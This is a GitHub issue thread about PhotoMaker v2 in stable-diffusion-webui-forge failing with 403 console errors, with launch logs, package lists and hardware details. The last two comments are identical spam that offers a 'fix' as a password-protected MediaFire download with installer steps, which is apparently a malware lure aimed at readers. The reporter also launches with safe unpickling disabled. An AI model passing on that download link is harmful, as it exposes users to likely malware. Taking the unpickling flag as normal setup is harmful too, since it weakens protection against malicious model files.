### ISSUE TITLE
photomaker2 don't open any photo or response, Failed to load resource: the server responded with a status of 403 (Forbidden) error on console

### ISSUE THREAD

**Issue by fgtm2023** [lllyasviel/stable-diffusion-webui-forge#1613]
Peace, photomaker2 don't open any photo or accept drag and drop or response to mouse clicks on submit, and got this error messages on browser console:

        Failed to load resource: the server responded with a status of 403 (Forbidden)
file=script.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
edit-order.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
edit-attention.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
aspectRatioOverlay.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
dragdrop.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
contextMenus.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
file=style.css:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
style.css:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
extensions.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
extraNetworks.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
generationParams.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
gradio.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
hires_fix.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
imageMaskFix.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
imageviewer.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
imageviewerGamepad.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
hints.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
inputAccordion.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
localStorage.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
notification.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
profilerVisualization.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
progressbar.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
resizeHandle.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
localization.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
settings.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
mobile.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
textualInversion.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
token-counters.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
ui.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
ui_settings_hints.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
prompt-bracket-checker.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
active_units.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
canvas.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
modal.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
openpose_editor.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
photopea.js:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
127.0.0.1/:119  Uncaught ReferenceError: set_theme is not defined
    at 127.0.0.1/:119:32
autoDetectRenderer.mjs:8  Uncaught (in promise) Error: Unable to auto-detect a suitable renderer.
    at Bb (autoDetectRenderer.mjs:8:9)
    at new ih (Application.mjs:10:34)
    at MT (pixi.ts:86:14)
    at ImageEditor.svelte:282:15
    at run (svelte.js:41:9)
    at Array.map (<anonymous>)
    at svelte.js:3182:48
    at flush (svelte.js:2141:5)
file=style.css:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
style.css:1 
        
        
        Failed to load resource: the server responded with a status of 403 (Forbidden)
127.0.0.1/:1  [Deprecation] -ms-high-contrast-adjust is in the process of being deprecated. Please see https://blogs.windows.com/msedgedev/2024/04/29/deprecating-ms-high-contrast/ for tips on updating to the new Forced Colors Mode standard.
127.0.0.1/:1  [Deprecation] -ms-high-contrast-adjust is in the process of being deprecated. Please see https://blogs.windows.com/msedgedev/2024/04/29/deprecating-ms-high-contrast/ for tips on updating to the new Forced Colors Mode standard.
127.0.0.1/:1  [Deprecation] -ms-high-contrast-adjust is in the process of being deprecated. Please see https://blogs.windows.com/msedgedev/2024/04/29/deprecating-ms-high-contrast/ for tips on updating to the new Forced Colors Mode standard.
[NEW] Explain Console errors by using Copilot in Edge: click

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

-P.S:

i use  gradio 4.41.0 instead of gradio 4.40.0 because forge gradio was loading forever and browser console log was:
index.js:288 Could not get api details: Failed to execute 'fetch' on 'Window': Failed to parse URL from http://127.0.0.1:7860http://127.0.0.1:7860/info
C @ index.js:288
index.js:1606 Uncaught TypeError: Failed to construct 'URL': Invalid URL
at parseURL (index.js:1606:27)
at isRelativeHrefOnAbsolutePath (index.js:1625:21)
at getRulesSync (index.js:5680:18)
at Object.details (index.js:5799:27)
at index.js:7041:47
at Array.map ()
at index.js:7041:22
at handleStyleOperations (index.js:6222:17)
at handleMinorTreeMutations (index.js:6249:13)
at index.js:479:25

-so i replaced gradio==4.40.0 to gradio==4.41.0 in requirements_versions.txt
then: pip install -r requirements_versions.txt --upgrade

and after this forge opened normally.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

python launch.py --theme dark --disable-safe-unpickle
Python 3.10.12 (main, Jul 29 2024, 16:56:48) [GCC 11.4.0]
Version: f2.0.1v1.10.1-previous-474-ga8483a3f
Commit hash: a8483a3f79c74873d554ac94d045eeb63a41176d
Launching Web UI with arguments: --theme dark --disable-safe-unpickle
Total VRAM 8176 MB, total RAM 19941 MB
pytorch version: 2.5.0.dev20240828+rocm6.2
Set vram state to: NORMAL_VRAM
Device: cuda:0 Radeon RX Vega : native
VAE dtype preferences: [torch.float32] -> torch.float32
CUDA Using Stream: False
2024-08-31 00:32:17.562610: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
2024-08-31 00:32:18.626265: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
Using sub quadratic optimization for cross attention
Using split attention for VAE
=============================================================================
You are running gradio 4.41.0.
The program is designed to work with gradio 4.40.0.
Using a different version of gradio is extremely likely to break the program.

Reasons why you have the mismatched gradio version can be:
  - you use --skip-install flag.
  - you use webui.py to start the program instead of launch.py.
  - an extension installs the incompatible gradio version.

Use --skip-version-check commandline argument to disable this check.
=============================================================================
ControlNet preprocessor location: /home/abdo/stable-diffusion-webui-forge/models/ControlNetPreprocessor
2024-08-31 00:32:27,409 - ControlNet - INFO - ControlNet UI callback registered.
Using online LoRAs in FP16: False
Running on local URL:  http://127.0.0.1:7860

To create a public link, set `share=True` in `launch()`.
Startup time: 24.9s (prepare environment: 7.1s, import torch: 12.1s, other imports: 0.5s, load scripts: 2.0s, create ui: 2.0s, gradio launch: 1.1s).
Opening in existing browser session.
Environment vars changed: {'stream': False, 'inference_memory': 1024.0, 'pin_shared_memory': False}
[GPU Setting] You will use 87.48% GPU memory (7152.00 MB) to load weights, and use 12.52% GPU memory (1024.00 MB) to do matrix computation.
[Unload] Trying to free all memory for cuda:0 with 0 models keep loaded ... Done.
Applied providers: ['CPUExecutionProvider'], with options: {'CPUExecutionProvider': {}}
model ignore: /home/abdo/.insightface/models/buffalo_l/1k3d68.onnx landmark_3d_68
Applied providers: ['CPUExecutionProvider'], with options: {'CPUExecutionProvider': {}}
model ignore: /home/abdo/.insightface/models/buffalo_l/2d106det.onnx landmark_2d_106
Applied providers: ['CPUExecutionProvider'], with options: {'CPUExecutionProvider': {}}
find model: /home/abdo/.insightface/models/buffalo_l/det_10g.onnx detection [1, 3, '?', '?'] 127.5 128.0
Applied providers: ['CPUExecutionProvider'], with options: {'CPUExecutionProvider': {}}
model ignore: /home/abdo/.insightface/models/buffalo_l/genderage.onnx genderage
Applied providers: ['CPUExecutionProvider'], with options: {'CPUExecutionProvider': {}}
find model: /home/abdo/.insightface/models/buffalo_l/w600k_r50.onnx recognition ['None', 3, 112, 112] 127.5 127.5
set det-size: (640, 640)
Loading pipeline components...: 100%|█████████████| 7/7 [00:17<00:00,  2.46s/it]
/home/abdo/stable-diffusion-webui-forge/modules_forge/patch_basic.py:38: FutureWarning: You are using `torch.load` with `weights_only=False` (the current default value), which uses the default pickle module implicitly. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling (See https://github.com/pytorch/pytorch/blob/main/SECURITY.md#untrusted-models for more details). In a future release, the default value for `weights_only` will be flipped to `True`. This limits the functions that could be executed during unpickling. Arbitrary objects will no longer be allowed to be loaded via this mode unless they are explicitly allowlisted by the user via `torch.serialization.add_safe_globals`. We recommend you start setting `weights_only=True` for any use case where you don't have full control of the loaded file. Please open an issue on GitHub for any issues related to this experimental feature.
  result = original_loader(*args, **kwargs)
Loading PhotoMaker v2 components [1] id_encoder from [/home/abdo/stable-diffusion-webui-forge/models/diffusers/models--TencentARC--PhotoMaker-V2/snapshots/f5a1e5155dc02166253fa7e29d13519f5ba22eac]...
4096
Loading PhotoMaker v2 components [2] lora_weights from [/home/abdo/stable-diffusion-webui-forge/models/diffusers/models--TencentARC--PhotoMaker-V2/snapshots/f5a1e5155dc02166253fa7e29d13519f5ba22eac]
Forge Space: Moved 9255 Modules to cpu
Automatic hook: T2IAdapter.forward
Automatic hook: PhotoMakerIDEncoder_CLIPInsightfaceExtendtoken.forward
Automatic hook: CLIPTextModel.forward
Automatic hook: CLIPTextModelWithProjection.forward
Automatic hook: UNet2DConditionModel.forward
Automatic hook: AutoencoderKL.forward
Automatic hook: AutoencoderKL.encode
Automatic hook: AutoencoderKL.decode
Running on local URL:  http://127.0.0.1:7861

To create a public link, set `share=True` in `launch()`.
Opening in existing browser session.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

my pc specs is:

-OS: Ubuntu 22.04.4 LTS x86_64
-Kernel: 6.8.0-40-generic
-Shell: zsh 5.8.1
-CPU: Intel i7-4790K (8) @ 4.600GHz
-GPU: AMD ATI Radeon RX Vega 56 8GiB
-Memory: 20GiB

-pip list | grep -i rocm
pytorch-triton-rocm 3.0.0+21eae954ef
torch 2.5.0.dev20240828+rocm6.2
torchaudio 2.5.0.dev20240828+rocm6.2
torchvision 0.20.0.dev20240828+rocm6.2

-pip list | grep -i cuda
nvidia-cuda-cupti-cu11 11.7.101
nvidia-cuda-cupti-cu12 12.1.105
nvidia-cuda-nvrtc-cu11 11.7.99
nvidia-cuda-nvrtc-cu12 12.1.105
nvidia-cuda-runtime-cu11 11.7.99
nvidia-cuda-runtime-cu12 12.1.105

-pip list | grep -i amd
amdsmi 24.5.1+c5106a9

-pip list | grep -i torch
lion-pytorch 0.2.2
open-clip-torch 2.20.0
pytorch-ignite 0.5.1
pytorch-lightning 1.9.4
pytorch-triton-rocm 3.0.0+21eae954ef
torch 2.5.0.dev20240828+rocm6.2
torchaudio 2.5.0.dev20240828+rocm6.2
torchdiffeq 0.2.3
torchmetrics 1.4.1
torchsde 0.2.6
torchvision 0.20.0.dev20240828+rocm6.2

-rocminfo
ROCk module is loaded
HSA System Attributes
Runtime Version: 1.13
Runtime Ext Version: 1.4
System Timestamp Freq.: 1000.000000MHz
Sig. Max Wait Duration: 18446744073709551615 (0xFFFFFFFFFFFFFFFF) (timestamp count)
Machine Model: LARGE
System Endianness: LITTLE
Mwaitx: DISABLED
DMAbuf Support: YES

==========
HSA Agents
Agent 1

Name: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
Uuid: CPU-XX
Marketing Name: Intel(R) Core(TM) i7-4790K CPU @ 4.00GHz
Vendor Name: CPU
Feature: None specified
Profile: FULL_PROFILE
Float Round Mode: NEAR
Max Queue Number: 0(0x0)
Queue Min Size: 0(0x0)
Queue Max Size: 0(0x0)
Queue Type: MULTI
Node: 0
Device Type: CPU
Cache Info:
L1: 32768(0x8000) KB
Chip ID: 0(0x0)
ASIC Revision: 0(0x0)
Cacheline Size: 64(0x40)
Max Clock Freq. (MHz): 4600
BDFID: 0
Internal Node ID: 0
Compute Unit: 8
SIMDs per CU: 0
Shader Engines: 0
Shader Arrs. per Eng.: 0
WatchPts on Addr. Ranges:1
Features: None
Pool Info:
Pool 1
Segment: GLOBAL; FLAGS: FINE GRAINED
Size: 20419288(0x13792d8) KB
Allocatable: TRUE
Alloc Granule: 4KB
Alloc Recommended Granule:4KB
Alloc Alignment: 4KB
Accessible by all: TRUE
Pool 2
Segment: GLOBAL; FLAGS: KERNARG, FINE GRAINED
Size: 20419288(0x13792d8) KB
Allocatable: TRUE
Alloc Granule: 4KB
Alloc Recommended Granule:4KB
Alloc Alignment: 4KB
Accessible by all: TRUE
Pool 3
Segment: GLOBAL; FLAGS: COARSE GRAINED
Size: 20419288(0x13792d8) KB
Allocatable: TRUE
Alloc Granule: 4KB
Alloc Recommended Granule:4KB
Alloc Alignment: 4KB
Accessible by all: TRUE
ISA Info:

Agent 2

Name: gfx900
Uuid: GPU-0214ff7c0fe82844
Marketing Name: Radeon RX Vega
Vendor Name: AMD
Feature: KERNEL_DISPATCH
Profile: BASE_PROFILE
Float Round Mode: NEAR
Max Queue Number: 128(0x80)
Queue Min Size: 64(0x40)
Queue Max Size: 131072(0x20000)
Queue Type: MULTI
Node: 1
Device Type: GPU
Cache Info:
L1: 16(0x10) KB
L2: 4096(0x1000) KB
Chip ID: 26751(0x687f)
ASIC Revision: 1(0x1)
Cacheline Size: 64(0x40)
Max Clock Freq. (MHz): 1590
BDFID: 768
Internal Node ID: 1
Compute Unit: 56
SIMDs per CU: 4
Shader Engines: 4
Shader Arrs. per Eng.: 1
WatchPts on Addr. Ranges:4
Coherent Host Access: FALSE
Features: KERNEL_DISPATCH
Fast F16 Operation: TRUE
Wavefront Size: 64(0x40)
Workgroup Max Size: 1024(0x400)
Workgroup Max Size per Dimension:
x 1024(0x400)
y 1024(0x400)
z 1024(0x400)
Max Waves Per CU: 40(0x28)
Max Work-item Per CU: 2560(0xa00)
Grid Max Size: 4294967295(0xffffffff)
Grid Max Size per Dimension:
x 4294967295(0xffffffff)
y 4294967295(0xffffffff)
z 4294967295(0xffffffff)
Max fbarriers/Workgrp: 32
Packet Processor uCode:: 464
SDMA engine uCode:: 434
IOMMU Support:: None
Pool Info:
Pool 1
Segment: GLOBAL; FLAGS: COARSE GRAINED
Size: 8372224(0x7fc000) KB
Allocatable: TRUE
Alloc Granule: 4KB
Alloc Recommended Granule:2048KB
Alloc Alignment: 4KB
Accessible by all: FALSE
Pool 2
Segment: GLOBAL; FLAGS: EXTENDED FINE GRAINED
Size: 8372224(0x7fc000) KB
Allocatable: TRUE
Alloc Granule: 4KB
Alloc Recommended Granule:2048KB
Alloc Alignment: 4KB
Accessible by all: FALSE
Pool 3
Segment: GROUP
Size: 64(0x40) KB
Allocatable: FALSE
Alloc Granule: 0KB
Alloc Recommended Granule:0KB
Alloc Alignment: 0KB
Accessible by all: FALSE
ISA Info:
ISA 1
Name: amdgcn-amd-amdhsa--gfx900:xnack-
Machine Models: HSA_MACHINE_MODEL_LARGE
Profiles: HSA_PROFILE_BASE
Default Rounding Mode: NEAR
Default Rounding Mode: NEAR
Fast f16: TRUE
Workgroup Max Size: 1024(0x400)
Workgroup Max Size per Dimension:
x 1024(0x400)
y 1024(0x400)
z 1024(0x400)
Grid Max Size: 4294967295(0xffffffff)
Grid Max Size per Dimension:
x 4294967295(0xffffffff)
y 4294967295(0xffffffff)
z 4294967295(0xffffffff)
FBarrier Max Size: 32
*** Done ***

**Comment by fgtm2023** [comment]
new update, i reverted to gradio 4.40.0 and Surprisingly forge and gradio worked normally, but photomaker2 problem is still unsolved.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
